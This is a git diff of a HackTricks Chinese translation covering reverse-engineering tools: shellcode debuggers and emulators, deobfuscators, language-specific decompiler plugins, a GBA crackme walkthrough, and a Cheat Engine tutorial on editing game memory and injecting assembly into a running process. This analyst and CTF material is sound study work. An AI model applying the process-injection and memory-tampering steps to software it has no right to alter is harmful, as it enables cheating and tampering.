然后,查看这个可以看到执行停在您要调试的dll中的位置
然后,查看此处可以看到执行何时在您想要调试的 DLL 中停止
## GUI应用程序 / 视频游戏
## GUI 应用程序 / 视频游戏
[**Cheat Engine**](https://www.cheatengine.org/downloads.php)是一个有用的程序,可以找到运行游戏内存中保存的重要值并更改它们。更多信息请参见:
[**Cheat Engine**](https://www.cheatengine.org/downloads.php) 是一个有用的程序,可以找到运行游戏内存中保存的重要值并更改它们。更多信息请参见:
{% content-ref url="cheat-engine.md" %}
[cheat-engine.md](cheat-engine.md)
{% endcontent-ref %}
[**PiNCE**](https://github.com/korcankaraokcu/PINCE)是GNU Project DebuggerGDB的前端/逆向工程工具,专注于游戏。但是,它也可用于任何逆向工程相关的内容。
[**PiNCE**](https://github.com/korcankaraokcu/PINCE) 是一个面向 GNU Project Debugger (GDB) 的前端/逆向工程工具,专注于游戏。然而,它可以用于任何与逆向工程相关的内容。
[**Decompiler Explorer**](https://dogbolt.org/)是一种连接多个反编译器的Web前端。这项网络服务允许您比较不同反编译器在小型可执行文件上的输出。
[**Decompiler Explorer**](https://dogbolt.org/) 是多个反编译器的网络前端。该网络服务允许您比较不同反编译器在小型可执行文件上的输出。
## ARMMIPS
## ARM & MIPS
{% embed url="https://github.com/nongiach/arm_now" %}
## Shellcode
## Shellcodes
### 使用blobrunner调试shellcode
### 使用 blobrunner 调试 shellcode
[**Blobrunner**](https://github.com/OALabs/BlobRunner)将在内存空间中**分配shellcode**将向您指示shellcode分配的**内存地址**,并将**停止**执行。\
然后,您需要将调试器Ida或x64dbg附加到进程并在指示的内存地址处设置断点然后**恢复**执行。这样您就可以调试shellcode了
[**Blobrunner**](https://github.com/OALabs/BlobRunner)**分配** shellcode 到内存空间中,**指示**您 shellcode 被分配的 **内存地址****停止** 执行。\
然后,您需要 **附加调试器**Ida 或 x64dbg到该进程并在指示的内存地址上放置 **断点****恢复** 执行。这样您将调试 shellcode
发布的github页面包含包含编译版本的zip文件:[https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5)\
您可以在以下链接中找到Blobrunner的略微修改版本。为了编译它只需**在Visual Studio Code中创建一个C/C++项目,复制并粘贴代码,然后构建**
发布的 GitHub 页面包含包含已编译版本的 zip 文件:[https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5)\
您可以在以下链接找到稍微修改过的 Blobrunner 版本。为了编译它,只需 **在 Visual Studio Code 中创建一个 C/C++ 项目,复制并粘贴代码并构建**
{% content-ref url="blobrunner.md" %}
[blobrunner.md](blobrunner.md)
{% endcontent-ref %}
### 使用jmp2it调试shellcode
### 使用 jmp2it 调试 shellcode
[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)与blobrunner非常相似。它将在内存空间中**分配shellcode**,并启动一个**永久循环**。然后,您需要将调试器附加到进程,**播放开始等待2-5秒然后按停止**,您将发现自己处于**永久循环**中。跳转到永久循环的下一条指令因为它将是对shellcode的调用最终您将发现自己正在执行shellcode。
[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4) 与 blobrunner 非常相似。它将 **分配** shellcode 到内存空间中,并启动一个 **无限循环**。然后,您需要 **附加调试器** 到该进程,**播放开始等待 2-5 秒并按停止**,您将发现自己处于 **无限循环** 中。跳到无限循环的下一条指令,因为它将是对 shellcode 的调用,最后您将发现自己正在执行 shellcode。
![](<../../.gitbook/assets/image (509).png>)
您可以在[发布页面中下载jmp2it的编译版本](https://github.com/adamkramer/jmp2it/releases/)
您可以在 [jmp2it 的发布页面](https://github.com/adamkramer/jmp2it/releases/) 下载已编译版本
### 使用Cutter调试shellcode
### 使用 Cutter 调试 shellcode
[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0)是radare的GUI。使用Cutter您可以动态地模拟和检查shellcode
[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) 是 radare 的 GUI。使用 cutter您可以模拟 shellcode 并动态检查它
请注意Cutter允许您“打开文件”和“打开shellcode”。在我的情况下当我将shellcode作为文件打开时它正确反编译了但当我将其作为shellcode打开时没有:
请注意Cutter 允许您 "Open File" 和 "Open Shellcode"。在我的情况下,当我将 shellcode 作为文件打开时,它正确反编译,但当我将其作为 shellcode 打开时却没有:
![](<../../.gitbook/assets/image (562).png>)
为了从您想要的位置开始模拟设置一个断点显然Cutter将自动从那里开始模拟:
为了在您想要的地方开始模拟,请在那里设置一个断点,显然 cutter 将自动从那里开始模拟:
![](<../../.gitbook/assets/image (589).png>)
@ -219,10 +219,10 @@ iisreset /noforce
![](<../../.gitbook/assets/image (186).png>)
### 解混淆shellcode并获取执行函数
### 反混淆 shellcode 并获取执行的函数
您应该尝试[**scdbg**](http://sandsprite.com/blogs/index.php?uid=7\&pid=152)。\
它将告诉您shellcode正在使用的**哪些函数**以及shellcode是否在内存中**解码**自身。
您应该尝试 [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7\&pid=152)。\
它将告诉您 shellcode 使用了 **哪些函数** 以及 shellcode 是否在内存中 **解码** 自身。
```bash
scdbg.exe -f shellcode # Get info
scdbg.exe -f shellcode -r #show analysis report at end of run
@ -231,64 +231,64 @@ scdbg.exe -f shellcode -d #Dump decoded shellcode
scdbg.exe -f shellcode /findsc #Find offset where starts
scdbg.exe -f shellcode /foff 0x0000004D #Start the executing in that offset
```
scDbg还配备了一个图形启动器您可以在其中选择所需的选项并执行shellcode
scDbg 还配备了一个图形启动器,您可以选择所需的选项并执行 shellcode
![](<../../.gitbook/assets/image (258).png>)
**创建Dump**选项将在内存中动态更改shellcode时转储最终shellcode可用于下载解码后的shellcode。**起始偏移量**对于在特定偏移量处启动shellcode很有用。**调试Shell**选项可用于使用scDbg终端调试shellcode但我发现前面解释的任何选项对于这个问题都更好因为您可以使用Ida或x64dbg
**创建转储** 选项将在内存中对 shellcode 进行动态更改时转储最终的 shellcode用于下载解码后的 shellcode。**起始偏移** 可以用于在特定偏移量处启动 shellcode。**调试 Shell** 选项对于使用 scDbg 终端调试 shellcode 很有用(然而,我发现之前解释的任何选项在这方面更好,因为您可以使用 Ida 或 x64dbg
### 使用CyberChef进行反汇编
### 使用 CyberChef 反汇编
将您的shellcode文件上传为输入并使用以下配方对其进行反编译:[https://gchq.github.io/CyberChef/#recipe=To\_Hex('Space',0)Disassemble\_x86('32','Full%20x86%20architecture',16,0,true,true)](https://gchq.github.io/CyberChef/#recipe=To\_Hex\('Space',0\)Disassemble\_x86\('32','Full%20x86%20architecture',16,0,true,true\))
将您的 shellcode 文件作为输入上传,并使用以下配方进行反编译:[https://gchq.github.io/CyberChef/#recipe=To\_Hex('Space',0)Disassemble\_x86('32','Full%20x86%20architecture',16,0,true,true)](https://gchq.github.io/CyberChef/#recipe=To\_Hex\('Space',0\)Disassemble\_x86\('32','Full%20x86%20architecture',16,0,true,true\))
## [Movfuscator](https://github.com/xoreaxeaxeax/movfuscator)
这个混淆器**修改所有`mov`指令**(是的,非常酷)。它还使用中断来改变执行流。有关其工作原理的更多信息:
这个混淆器**修改所有`mov` 指令**(是的,真的很酷)。它还使用中断来改变执行流程。有关其工作原理的更多信息:
* [https://www.youtube.com/watch?v=2VF\_wPkiBJY](https://www.youtube.com/watch?v=2VF\_wPkiBJY)
* [https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas\_2015\_the\_movfuscator.pdf](https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas\_2015\_the\_movfuscator.pdf)
如果您幸运,[demovfuscator](https://github.com/kirschju/demovfuscator)将对二进制文件进行反混淆。它有几个依赖项
如果您幸运的话[demovfuscator](https://github.com/kirschju/demovfuscator) 将解混淆该二进制文件。它有几个依赖项
```
apt-get install libcapstone-dev
apt-get install libz3-dev
```
并[安装keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md) (`apt-get install cmake; mkdir build; cd build; ../make-share.sh; make install`)
[安装 keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md)`apt-get install cmake; mkdir build; cd build; ../make-share.sh; make install`
如果你在玩一个**CTF这个绕过方法来找到flag**可能会非常有用:[https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html)
如果你正在参加一个**CTF这个找到标志的变通方法**可能会非常有用:[https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html)
## Rust
要找到**入口点**搜索函数中的`::main`,如下所示:
要找到**入口点**可以通过`::main`搜索函数,如下所示:
![](<../../.gitbook/assets/image (1080).png>)
在这种情况下,二进制文件被称为authenticator所以很明显这是一个有趣的主函数。\
有了被调用的**函数的名称**,搜索它们在**互联网**上,了解它们的**输入**和**输出**。
在这种情况下,二进制文件被称为 authenticator因此很明显这是有趣的主函数。\
拥有被调用的**函数**的**名称**,在**互联网上**搜索它们以了解它们的**输入**和**输出**。
## **Delphi**
对于Delphi编译的二进制文件可以使用[https://github.com/crypto2011/IDR](https://github.com/crypto2011/IDR)
对于 Delphi 编译的二进制文件,可以使用 [https://github.com/crypto2011/IDR](https://github.com/crypto2011/IDR)
如果你需要反向一个Delphi二进制文件我建议你使用IDA插件[https://github.com/Coldzer0/IDA-For-Delphi](https://github.com/Coldzer0/IDA-For-Delphi)
如果你必须反向工程一个 Delphi 二进制文件,我建议你使用 IDA 插件 [https://github.com/Coldzer0/IDA-For-Delphi](https://github.com/Coldzer0/IDA-For-Delphi)
只需按下**ATL+f7**在IDA中导入Python插件然后选择Python插件。
只需按 **ATL+f7**(在 IDA 中导入 python 插件)并选择 python 插件。
这个插件将在调试开始时执行二进制文件并动态解析函数名称。开始调试后再次按下开始按钮绿色按钮或f9将在真正代码的开头命中断点。
此插件将在调试开始时执行二进制文件并动态解析函数名称。启动调试后,再次按下开始按钮(绿色按钮或 f9并且在真实代码的开头会触发一个断点。
这也非常有趣,因为如果你在图形应用程序中按下一个按钮,调试器将停在该按钮执行的函数中。
这也非常有趣,因为如果你在图形应用程序中按下一个按钮,调试器将停在该按钮执行的函数中。
## Golang
如果你需要反向一个Golang二进制文件我建议你使用IDA插件[https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper)
如果你必须反向工程一个 Golang 二进制文件,我建议你使用 IDA 插件 [https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper)
只需按下**ATL+f7**在IDA中导入Python插件然后选择Python插件。
只需按 **ATL+f7**(在 IDA 中导入 python 插件)并选择 python 插件。
这将解析函数的名称。
## 编译的Python
## 编译的 Python
这个页面中你可以找到如何从一个ELF/EXE Python编译的二进制文件中获取Python代码:
此页面中,你可以找到如何从 ELF/EXE python 编译的二进制文件中获取 python 代码:
{% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
[.pyc.md](../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
@ -296,14 +296,14 @@ apt-get install libz3-dev
## GBA - Game Body Advance
如果你得到了一个GBA游戏的**二进制文件**,你可以使用不同的工具来**模拟**和**调试**它:
如果你获得了 GBA 游戏的**二进制文件**,你可以使用不同的工具来**模拟**和**调试**它:
* [**no$gba**](https://problemkaputt.de/gba.htm)_下载调试版本_- 包含一个带界面的调试器
* [**mgba** ](https://mgba.io)- 包含一个CLI调试器
* [**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) - Ghidra插件
* [**GhidraGBA**](https://github.com/SiD3W4y/GhidraGBA) - Ghidra插件
* [**no$gba**](https://problemkaputt.de/gba.htm)_下载调试版本_- 包含带界面的调试器
* [**mgba** ](https://mgba.io) - 包含 CLI 调试器
* [**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) - Ghidra 插件
* [**GhidraGBA**](https://github.com/SiD3W4y/GhidraGBA) - Ghidra 插件
[**no$gba**](https://problemkaputt.de/gba.htm)中在_**Options --> Emulation Setup --> Controls**_\*\* \*\*你可以看到如何按下Game Boy Advance的**按钮**
[**no$gba**](https://problemkaputt.de/gba.htm) 中_**选项 --> 模拟设置 --> 控制**_\*\* \*\* 你可以看到如何按下 Game Boy Advance **按钮**
![](<../../.gitbook/assets/image (581).png>)
@ -320,11 +320,11 @@ DOWN = 128
R = 256
L = 256
```
因此,在这种程序中,有趣的部分将是**程序如何处理用户输入**。在地址**0x4000130**处,您将找到常见的函数:**KEYINPUT**。
所以,在这种程序中,**程序如何处理用户输入**将是有趣的部分。在地址 **0x4000130** 你会找到常见的函数:**KEYINPUT**。
![](<../../.gitbook/assets/image (447).png>)
上图中,您可以发现该函数是从**FUN\_080015a8**地址_0x080015fa_ 和 _0x080017ac_调用的
前面的图像中,你可以看到该函数是从 **FUN\_080015a8** 调用的地址_0x080015fa_ 和 _0x080017ac_)。
在该函数中,在一些初始化操作之后(没有任何重要性):
```c
@ -347,7 +347,7 @@ FUN_08000dd0(&DAT_02009584,0x6000000,&DAT_030000dc);
FUN_08000354(&DAT_030000dc,0x3c);
uVar4 = DAT_030004d8;
```
发现了这段代码:
找到这段代码:
```c
do {
DAT_030004da = uVar4; //This is the last key pressed
@ -359,7 +359,7 @@ uVar2 = DAT_030004dc;
uVar1 = *puVar6;
if ((uVar1 & DAT_030004da & ~uVar4) != 0) {
```
最后的if语句检查**`uVar4`**是否在**最后的Keys**中,而不是当前的密钥,也称为释放按钮(当前密钥存储在**`uVar1`**中)。
最后的 if 检查 **`uVar4`** 是否在 **最后的 Keys** 中,而不是当前键,也称为放开一个按钮(当前键存储在 **`uVar1`** 中)。
```c
if (uVar1 == 4) {
DAT_030000d4 = 0;
@ -387,17 +387,17 @@ FUN_08000864();
if (uVar1 == 0x10) {
DAT_030000d8 = DAT_030000d8 + 0x3a;
```
在前面的代码中,您可以看到我们正在将**uVar1**(按下按钮的**所在的位置**)与一些值进行比较:
在前面的代码中,您可以看到我们正在将 **uVar1****按下按钮的**所在的位置)与一些值进行比较:
* 首先,它与**值4****SELECT**按钮)进行比较:在挑战中,此按钮清除屏幕
* 然后,将其与**值8****START**按钮)进行比较:在挑战中,这会检查代码是否有效以获取标志。
* 在这种情况下,将**`DAT_030000d8`**与0xf3进行比较如果值相同则执行一些代码。
* 在任何其他情况下将检查一些cont`DAT_030000d4`。这是一个cont因为在输入代码后立即加1。
如果小于8则执行涉及向**`DAT_030000d8`**添加值的操作基本上是将按下的键的值添加到此变量中只要cont小于8
* 首先,它与 **值 4****SELECT** 按钮)进行比较:在这个挑战中,这个按钮清除屏幕
* 然后,它与 **值 8****START** 按钮)进行比较:在这个挑战中,这个检查代码是否有效以获取标志。
* 在这种情况下,变量 **`DAT_030000d8`** 与 0xf3 进行比较,如果值相同,则执行某些代码。
* 在其他情况下,检查某个 cont`DAT_030000d4`)。这是一个 cont因为在进入代码后它会加 1。\
**如果** 小于 8则会进行一些涉及 **添加** 值到 **`DAT_030000d8`** 的操作(基本上是将按下的键的值添加到这个变量中,只要 cont 小于 8
因此,在这个挑战中,知道按钮的值,您需要**按下长度小于8的组合使得结果相加为0xf3**。
因此,在这个挑战中,知道按钮的值,您需要 **按下一个长度小于 8 的组合,使得结果的和为 0xf3。**
**本教程的参考资料** [**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/)
**本教程的参考:** [**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/)
## Game Boy
@ -406,7 +406,7 @@ DAT_030000d8 = DAT_030000d8 + 0x3a;
## 课程
* [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering)
* [https://github.com/malrev/ABD](https://github.com/malrev/ABD)(二进制反混淆)
* [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (二进制去混淆)
**Try Hard Security Group**
@ -414,16 +414,17 @@ DAT_030000d8 = DAT_030000d8 + 0x3a;
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版本的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,159 +1,161 @@
# Cheat Engine
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT收藏品](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github仓库提交PR来分享您的黑客技巧**
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
[**Cheat Engine**](https://www.cheatengine.org/downloads.php) 是一个有用的程序,可以找到运行游戏内存中保存的重要值并进行更改。\
您下载并运行它时,会看到如何使用该工具的教程。如果您想学习如何使用该工具,强烈建议您完成教程
[**Cheat Engine**](https://www.cheatengine.org/downloads.php) 是一个有用的程序,可以找到运行游戏内存中保存的重要值的位置并进行更改。\
你下载并运行它时,你会**看到**一个**使用工具的教程**。如果你想学习如何使用这个工具,强烈建议你完成它
## 在搜索什么?
## 在搜索什么?
![](<../../.gitbook/assets/image (762).png>)
这个工具非常有用,可以找到程序内存中存储的某些值(通常是数字)的位置。\
**通常数字**以**4字节**形式存储,但您也可以找到**双精度**或**浮点**格式,或者您可能想要查找与数字**不同的内容**。因此,您需要确保选择您要搜索的内容
这个工具非常有用,可以找到**某个值**(通常是一个数字)**在程序内存中的存储位置**。\
**通常数字**以**4字节**形式存储,但你也可以找到**双精度**或**浮点**格式,或者你可能想寻找**不同于数字**的东西。因此,你需要确保你**选择**你想要**搜索的内容**
![](<../../.gitbook/assets/image (324).png>)
您还可以指定**不同类型**的**搜索**
你还可以指示**不同**类型的**搜索**
![](<../../.gitbook/assets/image (311).png>)
您还可以选中复选框**在扫描内存时停止游戏**
你还可以勾选框以**在扫描内存时停止游戏**
![](<../../.gitbook/assets/image (1052).png>)
### 快捷
###
_**编辑 --> 设置 --> 快捷键**_中您可以为不同目的设置不同的**快捷键**,比如**停止**游戏(如果您想要扫描内存的某个时刻非常有用)。其他选项也可用:
_**编辑 --> 设置 --> 热键**_ 中,你可以为不同的目的设置不同的**热键**,例如**停止**游戏(如果你想在某个时候扫描内存,这非常有用)。还有其他选项可用:
![](<../../.gitbook/assets/image (864).png>)
## 修改值
一旦您**找到**了您要**查找的值**的位置(关于此更多信息请参见以下步骤),您可以通过双击它,然后双击其值来**修改它**
一旦你**找到**你正在**寻找的值**的位置(更多内容在后面的步骤中),你可以通过双击它来**修改**它,然后双击它的值
![](<../../.gitbook/assets/image (563).png>)
最后,选中复选框以在内存中进行修改:
最后**勾选**以在内存中完成修改:
![](<../../.gitbook/assets/image (385).png>)
对内存的**更改**将立即**应用**(请注意,直到游戏再次使用此值,该值**不会在游戏中更新**)。
**内存**的**更改**将立即**应用**(请注意,直到游戏再次使用此值,该值**不会在游戏中更新**)。
## 搜索值
因此,我们假设有一个重要值(比如您的用户生命值)需要改进,您正在查找这个值在内存中的位置)
所以,我们假设有一个重要的值(比如你用户的生命值)你想要提高,你正在内存中寻找这个值。
### 通过已知更改
### 通过已知的变化
假设您正在寻找值100您**执行扫描**以搜索该值,然后找到许多匹配项:
假设你在寻找值100你**执行扫描**以搜索该值,并且你发现了很多匹配项:
![](<../../.gitbook/assets/image (108).png>)
然后,您执行某些操作使**值更改**,然后**停止**游戏并**执行**下一个**扫描**
然后,你做了一些事情使得**值发生变化**,你**停止**游戏并**执行**下一次扫描
![](<../../.gitbook/assets/image (684).png>)
Cheat Engine将搜索**从100变为新值**的**值**。恭喜,您**找到**了您要查找的值的**地址**,现在可以修改它。\
_如果您仍然有几个值,请执行一些操作以再次修改该值,然后执行另一个“下一个扫描”以过滤地址。_
Cheat Engine 将搜索**从100变为新值**的**值**。恭喜你,你**找到了**你正在寻找的值的**地址**,现在你可以修改它。\
_如果你仍然有多个值,请做一些事情再次修改该值,并执行另一次“下一次扫描”以过滤地址。_
### 未知值,已知更改
### 未知值,已知变化
这种情况下,您**不知道值**,但您知道**如何使其更改**(甚至知道更改的值),您可以搜索您的数字。
你**不知道值**但你知道**如何使其变化**(甚至变化的值)的情况下,你可以寻找你的数字。
因此,首先执行类型为“**未知初始值**”的扫描:
所以,首先执行一种类型为“**未知初始值**”的扫描:
![](<../../.gitbook/assets/image (890).png>)
然后,使值更改,指示**值如何更改**在我的情况下减少了1然后执行**下一个扫描**
然后,使值发生变化,指示**值**是**如何变化的**在我的情况下它减少了1并执行**下一次扫描**
![](<../../.gitbook/assets/image (371).png>)
您将看到**以所选方式修改的所有值**
你将看到**所有以所选方式修改的值**
![](<../../.gitbook/assets/image (569).png>)
找到您的值后,您可以修改它。
一旦你找到了你的值,你可以修改它。
请注意,有**许多可能的更改**,您可以根据需要**重复执行这些步骤**以过滤结果:
请注意,有很多可能的变化,你可以根据需要多次执行这些**步骤**以过滤结果:
![](<../../.gitbook/assets/image (574).png>)
### 随机内存地址 - 查找代码
到目前为止,我们学会了如何找到存储值的地址,但很可能在**游戏的不同执行中,该地址在内存的不同位置**。因此,让我们找出如何始终找到该地址。
到目前为止,我们学习了如何找到存储值的地址,但在**游戏的不同执行中,该地址很可能位于内存的不同位置**。所以让我们找出如何始终找到该地址。
使用提到的一些技巧,找到当前游戏存储重要值的地址。然后(如果您愿意停止游戏),在找到的地址上**右键单击**,然后选择“**查找访问此地址的内容**”或“**查找写入此地址的内容**”:
使用一些提到的技巧,找到当前游戏存储重要值的地址。然后(如果你愿意,可以停止游戏)右键单击找到的**地址**选择“**查找访问此地址的内容**”或“**查找写入此地址的内容**”:
![](<../../.gitbook/assets/image (1067).png>)
**第一个选项**对于了解**哪些代码部分**正在**使用**此**地址**很有用(对于更多事情如**知道在哪里可以修改游戏的代码**很有用)。\
**第二个选项**更**具体**,在这种情况下将更有帮助,因为我们有兴趣知道**这个值是从哪里写入**的
**第一个选项**对于了解**代码**的**哪些部分**在**使用**此**地址**非常有用(这对于更多事情也很有用,比如**知道你可以在哪里修改游戏的代码**)。\
**第二个选项**更**具体**,在这种情况下更有帮助,因为我们想知道**这个值是从哪里写入的**
选择其中一个选项后,**调试器**将**附加**到程序,并将出现一个新的**空窗口**。现在,**玩**游戏并**修改**该**值**(无需重新启动游戏)。**窗口**应该填满**修改**该**值**的**地址**
一旦你选择了其中一个选项,**调试器**将**附加**到程序,并且会出现一个新的**空窗口**。现在,**玩**游戏并**修改**该**值**(无需重新启动游戏)。**窗口**应该会**填充**正在**修改**该**值**的**地址**
![](<../../.gitbook/assets/image (91).png>)
现在您找到了修改值的地址,您可以**随意修改代码**Cheat Engine允许您快速将其修改为NOPs
现在你找到了修改值的地址,你可以**随意修改代码**Cheat Engine 允许你快速将其修改为 NOP
![](<../../.gitbook/assets/image (1057).png>)
因此,您现在可以修改代码,使其不影响您的数字,或者始终以积极的方式影响。
所以,你现在可以修改它,使得代码不会影响你的数字,或者总是以积极的方式影响它。
### 随机内存地址 - 查找指针
按照之前的步骤,找到你感兴趣的值所在的位置。然后,使用 "**查找写入此地址的内容**" 找出写入该值的地址,双击它以查看反汇编视图:
按照前面的步骤,找到你感兴趣的值的位置。然后,使用“**查找写入此地址的内容**”找出哪个地址写入此值,并双击它以获取反汇编视图:
![](<../../.gitbook/assets/image (1039).png>)
然后,执行一个新的扫描 **搜索方括号中的十六进制值**(在这种情况下是 $edx 的值):
然后,执行新的扫描**搜索“\[]”之间的十六进制值**(在这种情况下是$edx的值):
![](<../../.gitbook/assets/image (994).png>)
_如果出现多个通常需要选择最小的地址)\
现在,我们已经**找到将修改我们感兴趣的值的指针**。
_如果出现多个通常需要最小的地址_\
现在,我们已经**找到将修改我们感兴趣的值的指针**。
点击 "**手动添加地址**"
点击“**手动添加地址**”
![](<../../.gitbook/assets/image (990).png>)
现在,点击 "Pointer" 复选框,并将找到的地址添加到文本框中(在这种情况下,前一个图像中找到的地址是 "Tutorial-i386.exe"+2426B0
现在,勾选“指针”复选框并在文本框中添加找到的地址在这种情况下前一张图片中找到的地址是“Tutorial-i386.exe”+2426B0
![](<../../.gitbook/assets/image (392).png>)
(注意第一个 "Address" 如何自动填充为您输入的指针地址
(注意第一个“地址”是从你输入的指针地址自动填充的
点击确定,将创建一个新的指针:
点击确定,一个新的指针将被创建
![](<../../.gitbook/assets/image (308).png>)
现在,每当您修改该值时,您都在**修改重要值,即使该值所在的内存地址不同**。
现在,每次你修改该值时,你都在**修改重要值,即使值所在的内存地址不同。**
### 代码注入
代码注入是一种技术,您可以将一段代码注入到目标进程中,然后重新路由代码执行以通过您编写的代码(例如给您积分而不是扣除它们)。
代码注入是一种技术,你将一段代码注入到目标进程中,然后重新路由代码的执行以通过你自己编写的代码(例如给你积分而不是减少它们)。
因此,假设您已经找到正在减少玩家生命的地址:
所以想象一下你找到了一个将1减去你玩家生命值的地址:
![](<../../.gitbook/assets/image (203).png>)
点击显示反汇编以获取**反汇编代码**。\
然后,点击 **CTRL+a** 调出自动汇编窗口,选择 _**Template --> 代码注入**_
然后,点击**CTRL+a**以调用自动汇编窗口并选择_**模板 --> 代码注入**_
![](<../../.gitbook/assets/image (902).png>)
填写**要修改的指令的地址**(通常会自动填充
填写**你想要修改的指令的地址**(这通常是自动填充的
![](<../../.gitbook/assets/image (744).png>)
@ -161,12 +163,12 @@ _如果您仍然有几个值请执行一些操作以再次修改该值
![](<../../.gitbook/assets/image (944).png>)
因此,在 "**newmem**" 部分插入您的新汇编代码,并从 "**originalcode**" 中删除原始代码,如果您不希望执行它。在此示例中,注入的代码将在减去 1 的基础上增加 2 分
因此,将你的新汇编代码插入到“**newmem**”部分,并从“**originalcode**”中删除原始代码,如果你不想执行它\*\*.\*\* 在这个例子中注入的代码将增加2分而不是减少1
![](<../../.gitbook/assets/image (521).png>)
**点击执行,然后您的代码应该被注入到程序中,改变功能的行为!**
**点击执行,这样你的代码应该被注入到程序中,改变功能的行为!**
## **参考**
* **Cheat Engine 教程,完成它以学习如何使用 Cheat Engine**
* **Cheat Engine 教程,完成它以学习如何开始使用 Cheat Engine**

View file

@ -1,42 +1,44 @@
# Word宏
# Word Macros
{% hint style="success" %}
